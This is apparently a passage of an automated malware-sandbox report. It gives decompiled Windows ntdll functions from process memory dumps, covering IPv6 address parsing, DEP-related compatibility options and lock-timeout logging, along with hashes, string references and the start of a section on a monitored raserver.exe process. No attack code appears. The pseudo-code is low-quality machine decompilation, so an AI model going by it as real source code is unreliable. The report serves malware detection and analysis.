                                                0x00a813bf
                                                0x00a813c2
                                                0x00a81424
                                                0x00a81424
                                                0x00a81424
                                                0x00a81427
                                                0x00a8142b
                                                0x00a8142c
                                                0x00a8142c
                                                0x00a8142c
                                                0x00000000
                                                0x00a8141c
                                                0x00a81411

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                • Instruction ID: 9bb5ff0cbf4bea62b3719ec61a768380f95b12e9dd7b2d19e37c31db67ad464c
                                                • Opcode Fuzzy Hash: 7c777b6726091f49dd0a9d011c1821f310e2863bf4d13446bf67e184df0fd0cd
                                                • Instruction Fuzzy Hash: 4A6127B5D00755AACB24EF59C8808BFBBB9EFD5300B54C52DF4DA4B581D334AA41CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A77EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00A77EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb22088; // 0x77505ff5
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(L00A77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A4DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A50D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A58375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00ABE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A93F92();
					_t38 = 1;
					L2:
					return E00A4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                0x00a77f08
                                                0x00a77f0f
                                                0x00a77f12
                                                0x00a77f1b
                                                0x00a77f31
                                                0x00a93ead
                                                0x00a93eb4
                                                0x00000000
                                                0x00000000
                                                0x00a93eba
                                                0x00a93ecd
                                                0x00a93ed2
                                                0x00a93ee1
                                                0x00a93ee7
                                                0x00a93eec
                                                0x00a93f12
                                                0x00a93f18
                                                0x00a93f1a
                                                0x00000000
                                                0x00000000
                                                0x00a93f20
                                                0x00a93f26
                                                0x00a93f28
                                                0x00000000
                                                0x00000000
                                                0x00a93f2e
                                                0x00a93f30
                                                0x00000000
                                                0x00000000
                                                0x00a93f3a
                                                0x00a93f3b
                                                0x00a93f53
                                                0x00a93f64
                                                0x00a93f69
                                                0x00a93f6c
                                                0x00a93f6d
                                                0x00a93f6f
                                                0x00a9e304
                                                0x00a9e30f
                                                0x00a9e315
                                                0x00a9e31e
                                                0x00a9e321
                                                0x00a9e327
                                                0x00a9e329
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00a9e32f
                                                0x00a9e32f
                                                0x00a9e337
                                                0x00a9e33a
                                                0x00a9e33b
                                                0x00a9e33d
                                                0x00a9e33f
                                                0x00a9e341
                                                0x00a9e341
                                                0x00a9e34e
                                                0x00a9e353
                                                0x00a9e358
                                                0x00a9e35d
                                                0x00a9e35f
                                                0x00000000
                                                0x00000000
                                                0x00a9e365
                                                0x00a9e365
                                                0x00a9e368
                                                0x00a9e36e
                                                0x00000000
                                                0x00000000
                                                0x00a9e374
                                                0x00a9e32f
                                                0x00a93f75
                                                0x00a93f7a
                                                0x00a93f7c
                                                0x00a93f7e
                                                0x00a93f86
                                                0x00a77f39
                                                0x00a77f47
                                                0x00a77f47
                                                0x00a77f37
                                                0x00a77f37
                                                0x00000000

                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A93F12
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A9E345
                                                • ExecuteOptions, xrefs: 00A93F04
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A93F75
                                                • Execute=1, xrefs: 00A93F5E
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A93EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A9E2FB
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A93F4A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                • Instruction ID: 2a784f9344ce5951899d836ac6aa1627647f2453516e066c3cc4246061c2dc92
                                                • Opcode Fuzzy Hash: c582499941d2d6140386de3e8b297140bff1a7e0aeb818a64e5b1555834f4239
                                                • Instruction Fuzzy Hash: 2B41B672A8021CBADF24DB94DDC6FEE73FCAB55700F0045A9F509E6081EA709B45CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A80B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00A80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00A58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00A4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00A80CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00A80CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00A806BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00A806BA(_t135, _t178) == 0 || E00A80A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00A80CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00A80CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00A806BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00A806BA(_t124, _t142) == 0 || E00A80A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                0x00a80b21
                                                0x00a80b24
                                                0x00a80b27
                                                0x00a80b2a
                                                0x00a80b2d
                                                0x00a80b30
                                                0x00a80b33
                                                0x00a80b36
                                                0x00a80b39
                                                0x00a80b3e
                                                0x00a80c65
                                                0x00a80c68
                                                0x00a80c6a
                                                0x00a80c6f
                                                0x00aaeb42
                                                0x00000000
                                                0x00000000
                                                0x00aaeb48
                                                0x00aaeb48
                                                0x00a80c75
                                                0x00a80c7a
                                                0x00aaeb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00aaeb5a
                                                0x00a80c80
                                                0x00a80c84
                                                0x00aaeb98
                                                0x00000000
                                                0x00000000
                                                0x00aaeba6
                                                0x00a80cb8
                                                0x00a80cba
                                                0x00a80cd3
                                                0x00a80cda
                                                0x00a80ce4
                                                0x00a80ce9
                                                0x00000000
                                                0x00a80cec
                                                0x00a80c8c
                                                0x00aaeb63
                                                0x00000000
                                                0x00000000
                                                0x00aaeb70
                                                0x00aaeb75
                                                0x00aaeb7d
                                                0x00000000
                                                0x00000000
                                                0x00aaeb8c
                                                0x00000000
                                                0x00aaeb8c
                                                0x00a80c96
                                                0x00000000
                                                0x00000000
                                                0x00a80ca2
                                                0x00a80cac
                                                0x00a80cb4
                                                0x00000000
                                                0x00000000
                                                0x00a80b44
                                                0x00a80b47
                                                0x00a80b49
                                                0x00000000
                                                0x00000000
                                                0x00a80b4f
                                                0x00a80b50
                                                0x00000000
                                                0x00000000
                                                0x00a80b56
                                                0x00a80b62
                                                0x00a80b7c
                                                0x00a80bac
                                                0x00a80a0f
                                                0x00aaeaaa
                                                0x00000000
                                                0x00aaeac4
                                                0x00aaeac4
                                                0x00a80bd0
                                                0x00a80bd0
                                                0x00a80bd4
                                                0x00a80bd9
                                                0x00000000
                                                0x00000000
                                                0x00a80bdb
                                                0x00a80be0
                                                0x00aaeb0e
                                                0x00a80a1a
                                                0x00000000
                                                0x00a80a1a
                                                0x00aaeb1a
                                                0x00aaeb1f
                                                0x00aaeb27
                                                0x00000000
                                                0x00000000
                                                0x00aaeb36
                                                0x00000000
                                                0x00aaeb36
                                                0x00a80bea
                                                0x00000000
                                                0x00000000
                                                0x00a80bf6
                                                0x00a80c00
                                                0x00a80c03
                                                0x00a80c0b
                                                0x00000000
                                                0x00a80c0b
                                                0x00aaeaaa
                                                0x00000000
                                                0x00a80a15
                                                0x00a80bb6
                                                0x00000000
                                                0x00a80bc6
                                                0x00a80bc6
                                                0x00a80bcb
                                                0x00a80c15
                                                0x00000000
                                                0x00000000
                                                0x00a80c1d
                                                0x00a80c20
                                                0x00a80c21
                                                0x00a80c24
                                                0x00a80c24
                                                0x00a80c26
                                                0x00000000
                                                0x00a80c26
                                                0x00a80bcd
                                                0x00000000
                                                0x00a80bcd
                                                0x00a80b89
                                                0x00a80b89
                                                0x00a80b90
                                                0x00000000
                                                0x00000000
                                                0x00a80b96
                                                0x00000000
                                                0x00a80b96
                                                0x00a80a04
                                                0x00a80a04
                                                0x00a80b9a
                                                0x00a80b9a
                                                0x00a80b9b
                                                0x00a80b9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00a80ba5
                                                0x00a80ac7
                                                0x00a80aca
                                                0x00aaeacf
                                                0x00000000
                                                0x00aaeade
                                                0x00aaeade
                                                0x00aaeae3
                                                0x00000000
                                                0x00000000
                                                0x00aaeaf3
                                                0x00aaeaf6
                                                0x00aaeaf7
                                                0x00aaeafe
                                                0x00aaeb01
                                                0x00000000
                                                0x00aaeb01
                                                0x00aaeacf
                                                0x00a80ad0
                                                0x00a80ad4
                                                0x00000000
                                                0x00000000
                                                0x00a80ada
                                                0x00a80ae6
                                                0x00a80c34
                                                0x00000000
                                                0x00a80c47
                                                0x00a80c49
                                                0x00a80c4a
                                                0x00a80c4e
                                                0x00a80c51
                                                0x00a80c54
                                                0x00a80c57
                                                0x00a80c5a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00a80c60
                                                0x00a80afb
                                                0x00a80afe
                                                0x00a80b02
                                                0x00a80b05
                                                0x00a80b08
                                                0x00000000
                                                0x00a80b08
                                                0x00a80ae6
                                                0x00a80b44
                                                0x00a809f8
                                                0x00a809f8
                                                0x00a809f9
                                                0x00000000
                                                0x00000000
                                                0x00aaeaa0
                                                0x00000000

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction ID: da0f3e67c07245a554817993a2fb5555378db85534ef3135e967e148c5833d03
                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                • Instruction Fuzzy Hash: 7DA1B1B1D0030ADFDFA8EF64C845EBEB7B4BF05305F24856AD852A7281D7349A49CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A80554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA2206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                • Instruction ID: 7662a3023d0ac1f1c6d74e8822ec220e7cd4a0393b1a915961b4bed8a8587431
                                                • Opcode Fuzzy Hash: 908223327254f09830818ec8ae3f7d4d877e2b0970df773f599098c952fda512
                                                • Instruction Fuzzy Hash: 52513935B002116FEF199B18CC81FA673A9AFD9710F218229FD55DF2C6DA31EC5587A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A814C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 00AAEA22
                                                  • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A8146B
                                                  • Part of subcall function 00A813CB: ___swprintf_l.LIBCMT ref: 00A81490
                                                • ___swprintf_l.LIBCMT ref: 00A8156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                • Instruction ID: 8eebf5763d3f5fbfe0faef7f2a56e820e9104b416245083c7acf16ea107c958d
                                                • Opcode Fuzzy Hash: 7d3d601b5c065af6819efa8aa9111b20fa3f77d37546ed2a927dd24314fe86d1
                                                • Instruction Fuzzy Hash: E52191B2900219ABCB24EF58CD41AEF73BCBB90700F548555FC4AD7141DB70AA5A8BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A653A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AA22F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 00AA2328
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00AA22FC
                                                • RTL: Resource at %p, xrefs: 00AA230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                • Instruction ID: 1317fc116970ccd443843b3140a28835e8de914156106ca3ee5e25088ffbf05f
                                                • Opcode Fuzzy Hash: 47360fa4984136556182ee5e1c49b921a4c9c39c788f914cf3dedb55397d740a
                                                • Instruction Fuzzy Hash: F9513572A007026BDF15EB38CD91FA673A8EF59760F104229FD49DF281EB61EC4187A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A6EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00AA248D
                                                • RTL: Re-Waiting, xrefs: 00AA24FA
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00AA24BD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                • Instruction ID: a9617e94e8cd553535f009ceadff3816f547e7db78c8739b9d94108c324ab5e5
                                                • Opcode Fuzzy Hash: 3027f4730e28788b4e5bdaff0af2008c4e52aa1852825e821c44ea06e2aa128d
                                                • Instruction Fuzzy Hash: 4541F375A00304BFCB24EB68CD85FAA77B8EF89720F208615F5559B2C1D734E95187A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00A7FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: __fassign
                                                • String ID:
                                                • API String ID: 3965848254-0
                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction ID: d320c53a9a8fa5328728e580ca10bc981a117142d8afb24f24fe5635d5ed1fc2
                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                • Instruction Fuzzy Hash: CE915A31E0020AEFDF28DF98CC456AEB7B4EB55314F24C47AD419A72A2E7305B85CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: raserver.exe PID: 2920 Parent PID: 1764 raserver.exeCOMMON

                                                Executed Functions

                                                Function 022667C7, Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 487nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0226691F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.686407352.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                Similarity
